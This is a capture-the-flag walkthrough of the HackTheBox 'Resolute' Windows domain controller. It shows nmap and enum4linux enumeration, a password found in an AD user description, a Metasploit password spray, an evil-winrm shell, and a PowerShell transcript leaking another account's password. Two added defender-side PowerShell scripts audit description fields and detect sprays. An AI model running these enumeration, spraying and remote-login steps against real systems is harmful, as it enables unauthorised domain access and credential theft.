Resolute is one of the machines currently available on the HackTheBox hacking platform, rated medium difficulty.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Resolute machine, 10.10.10.169, to /etc/hosts as resolute.htb and start with the nmap port scan.
```
# Nmap 7.80 scan initiated Tue May 12 20:20:50 2020 as: nmap -sV -Pn -p- -sC -oA resolute-nmap 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.056s latency).
Not shown: 65509 closed ports
PORT      STATE    SERVICE      VERSION
53/tcp    open     domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-12 18:32:54Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf       .NET Message Framing
12851/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc        Microsoft Windows RPC
49665/tcp open     msrpc        Microsoft Windows RPC
49666/tcp open     msrpc        Microsoft Windows RPC
49667/tcp open     msrpc        Microsoft Windows RPC
49670/tcp open     msrpc        Microsoft Windows RPC
49676/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open     msrpc        Microsoft Windows RPC
49688/tcp open     msrpc        Microsoft Windows RPC
49712/tcp open     msrpc        Microsoft Windows RPC
54238/tcp open     unknown
55817/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/12%Time=5EBAE95D%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m38s, deviation: 4h02m30s, median: 10m37s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-12T11:33:46-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-12T18:33:45
|_  start_date: 2020-05-12T16:50:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 12 20:25:21 2020 -- 1 IP address (1 host up) scanned in 270.83 seconds
```
We find quite a few open ports and services on this machine, such as DNS, Active Directory, etc., but let's keep gathering information.
Enumeration
We continue the enumeration with the enum4linux script to see whether we can get more information about the system, users, domain, etc.
```
$ enum4linux -a 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 12 20:24:24 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.169    |
 ====================================================
[E] Can't find workgroup/domain

 ============================================
|    Nbtstat Information for 10.10.10.169    |
 ============================================
Looking up status of 10.10.10.169
No reply from 10.10.10.169

 =====================================
|    Session Check on 10.10.10.169    |
 =====================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
[+] Got domain/workgroup name:

 ===========================================
|    Getting domain SID for 10.10.10.169    |
 ===========================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ======================================
|    OS information on 10.10.10.169    |
 ======================================
[+] Got OS info for 10.10.10.169 from smbclient:
[+] Got OS info for 10.10.10.169 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================
|    Users on 10.10.10.169    |
 =============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail        Name: (null)          Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)          Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela         Name: (null)          Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette        Name: (null)          Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika         Name: (null)          Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire         Name: (null)          Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude         Name: (null)          Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount   Name: (null)          Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia        Name: (null)          Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred           Name: (null)          Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest            Name: (null)          Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo        Name: (null)          Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt           Name: (null)          Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus         Name: (null)          Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko           Name: Marko Novak     Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie        Name: (null)          Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki          Name: (null)          Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo          Name: (null)          Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per            Name: (null)          Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan            Name: Ryan Bertrand   Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally          Name: (null)          Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon          Name: (null)          Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve          Name: (null)          Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie         Name: (null)          Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita         Name: (null)          Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf            Name: (null)          Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach           Name: (null)          Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

 =========================================
|    Share Enumeration on 10.10.10.169    |
 =========================================

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

 ====================================================
|    Password Policy Information for 10.10.10.169    |
 ====================================================
[+] Attaching to 10.10.10.169 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
        [+] MEGABANK
        [+] Builtin
[+] Password Info for Domain: MEGABANK
        [+] Minimum password length: 7
        [+] Password history length: 24
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: 1 day 4 minutes
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7

 ==============================
|    Groups on 10.10.10.169    |
 ==============================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'DnsAdmins' (RID: 1101) has member: Couldn't lookup SIDs

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]

[+] Getting domain group memberships:
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator

 =======================================================================
|    Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 =============================================
|    Getting printer info for 10.10.10.169    |
 =============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Tue May 12 20:26:20 2020
```
In the output above we find an interesting line where a user and their password are spelled out in the account description, marko:Welcome123!
```
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko           Name: Marko Novak     Desc: Account created. Password set to Welcome123!
```
It seems too easy; we try logging in with that user but get nowhere:
```
$ ruby evil-winrm.rb -i 10.10.10.169 -u marko -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1
```
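From the defender's side, the two findings in the enum4linux output that made this foothold possible are a credential written into a user's Description attribute (readable by any authenticated user, and here even by a null session) and a domain password policy with complexity disabled and no lockout threshold. The following PowerShell is an added audit script, not part of the original writeup; it assumes the ActiveDirectory RSAT module is installed and that the caller can read user objects. The regular expression and the policy thresholds are this example's own choices.

```powershell
# Added defender-side audit, not part of the original writeup.
# Assumes the ActiveDirectory module (RSAT) is available and that the
# running account can read user objects in the domain.
Import-Module ActiveDirectory

# Free-text attributes readable by every authenticated user (and, as the
# enum4linux output on this machine shows, sometimes by anonymous sessions).
$attrs = 'Description', 'Info'

# Heuristic (constructed for this example) for "someone wrote a password here".
$pattern = '(?i)\b(password|passwd|pwd|contrase[ñn]a)\b\s*(set to|is|:|=)?\s*\S+'

function Find-SecretInUserAttributes {
    param([string]$SearchBase)
    $users = if ($SearchBase) {
        Get-ADUser -Filter * -SearchBase $SearchBase -Properties $attrs
    } else {
        Get-ADUser -Filter * -Properties $attrs
    }
    foreach ($u in $users) {
        foreach ($a in $attrs) {
            $v = $u.$a
            if ($v -and ($v -match $pattern)) {
                [pscustomobject]@{
                    SamAccountName = $u.SamAccountName
                    Attribute      = $a
                    Value          = $v
                }
            }
        }
    }
}

function Test-PasswordPolicyWeakness {
    # Thresholds below are this example's assumptions, not a Microsoft baseline.
    $p = Get-ADDefaultDomainPasswordPolicy
    $findings = @()
    if (-not $p.ComplexityEnabled) { $findings += 'Password complexity is disabled' }
    if ($p.MinPasswordLength -lt 12) { $findings += "Minimum password length is only $($p.MinPasswordLength)" }
    if ($p.LockoutThreshold -eq 0) { $findings += 'Account lockout threshold is 0: spraying one password across every account is never throttled' }
    if ($p.PasswordHistoryCount -lt 24) { $findings += "Password history is only $($p.PasswordHistoryCount)" }
    $findings
}

# Usage
Find-SecretInUserAttributes | Format-Table -AutoSize
Test-PasswordPolicyWeakness
```

Run against a domain like MEGABANK the first function would surface the marko entry, and the second would report the disabled complexity and missing lockout threshold that the enum4linux password-policy section shows. The fix is to clear the attribute, rotate the affected account's password, and treat the description field as public data in onboarding procedures.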
With the data obtained, we build a wordlist of the discovered users and use the Metasploit smb_login module to check whether the discovered password belongs to any of them:
```
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.169:445      - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\DefaultAccount:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!',
[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!'
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!',
[*] 10.10.10.169:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
And we have a candidate:
```
MEGABANK\melanie:Welcome123!
```
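What the smb_login run above looks like on the domain controller is one source address producing a burst of failed logons across many different accounts in a few seconds, followed by one success. The following PowerShell is an added detection example, not part of the original writeup; it is meant to run on a DC (or over forwarded events) and assumes that logon failure auditing is enabled so that event 4625 carries the source IP and target account. The thresholds are this example's own choices.

```powershell
# Added detection example, not part of the original writeup. Run on a domain
# controller with rights to read the Security log, or point it at forwarded
# events. Assumes "Audit Logon" failure auditing is on, so 4625 events carry
# IpAddress and TargetUserName.

function Get-PasswordSprayCandidates {
    param(
        [int]$Hours = 1,
        [int]$MinDistinctUsers = 10   # constructed threshold; tune for your environment
    )
    $since = (Get-Date).AddHours(-$Hours)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } `
                           -ErrorAction SilentlyContinue

    # Flatten the EventData of each 4625 into a small record.
    $rows = foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
        [pscustomobject]@{
            Time   = $e.TimeCreated
            Source = $d['IpAddress']
            User   = $d['TargetUserName']
            Status = $d['Status']        # 0xC000006D = bad user name or password
        }
    }

    # A spray is many distinct target accounts from the same source, not many
    # attempts against one account (which is what lockout policy would catch).
    $rows | Group-Object Source | ForEach-Object {
        $distinct = ($_.Group.User | Sort-Object -Unique).Count
        if ($distinct -ge $MinDistinctUsers) {
            [pscustomobject]@{
                Source        = $_.Name
                Attempts      = $_.Count
                DistinctUsers = $distinct
                FirstSeen     = ($_.Group.Time | Measure-Object -Minimum).Minimum
                LastSeen      = ($_.Group.Time | Measure-Object -Maximum).Maximum
            }
        }
    }
}

# Usage
Get-PasswordSprayCandidates -Hours 24 | Format-Table -AutoSize
```

The grouping is by source rather than by account on purpose: with the lockout threshold set to None, as this domain's policy shows, per-account counters never trip, so the only signal is the fan-out across accounts. A 4624 (successful logon, logon type 3) from the same source inside the same window is the one to follow up on first.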
With the discovered credentials we use the ldapdomaindump tool to get more information about the domain:
```
$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```
And we get information like that shown in the following screenshots:
There we see, among other things, that the user we obtained belongs to the “Remote Management Users” group (which is what allows WinRM access), and that the machine name is RESOLUTE.
Getting the user flag
With melanie's credentials we use the evil-winrm tool to access the system:
```
$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents>
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ..
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/3/2019   7:33 AM             32 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop>
```
And with that we get the user flag.
Lateral movement
Now that we have access to the system, we keep looking for weak points we could use to escalate privileges.
We go to the root of the C: drive and, after some poking around, discover something in particular. We list it:
```
*Evil-WinRM* PS C:\> Get-ChildItem -Force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        5/12/2020  10:33 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/12/2020   9:50 AM      402653184 pagefile.sys
```
And we discover a hidden directory called PSTranscripts, where we might find a history of PowerShell commands that were run, along with their output. We keep looking inside it:
```
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Force


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> Get-ChildItem -Force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
```
And finally we find the transcript, whose content is as follows:
```
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
```
